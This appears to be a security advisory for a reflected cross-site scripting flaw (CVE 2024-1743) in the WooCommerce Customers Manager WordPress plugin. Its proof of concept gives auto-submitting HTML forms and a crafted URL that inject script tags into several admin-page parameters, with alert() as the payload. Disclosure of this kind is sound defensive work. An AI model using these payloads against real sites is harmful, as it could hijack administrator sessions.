WooCommerce Customers Manager < 29.8 – Reflected XSS | CVE 2024-1743

Description

The plugin does not sanitise and escape various parameters before outputting them back in pages and attributes, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin

Proof of Concept

Make a logged in admin open the HTML page/URLs below

<body onload="document.forms[0].submit()">
    <form action="https://example.com/wp-admin/admin.php?page=woocommerce-customers-manager" method="POST">
        <input type="text" name="page" value='"><script>alert(/XSS-page/)</script>'>
        <input type="text" name="wccm_customers_ids" value='"><script>alert(/XSS-wccm_customers_ids/)</script>'>
        <input type="submit" value="submit">
    </form>
</body>

<body onload="document.forms[0].submit()">
    <form action="https://example.com/wp-admin/?page=woocommerce-customers-manager&action=customer_details" method="POST">
        <input type="text" name="page" value='"><script>alert(/XSS/)</script>'>
        <input type="submit" value="submit">
    </form>
</body>

https://example.com/wp-admin/admin.php?page=woocommerce-customers-manager&action=wccm-customer-metadata&customer="><script>alert(/XSS/)</script>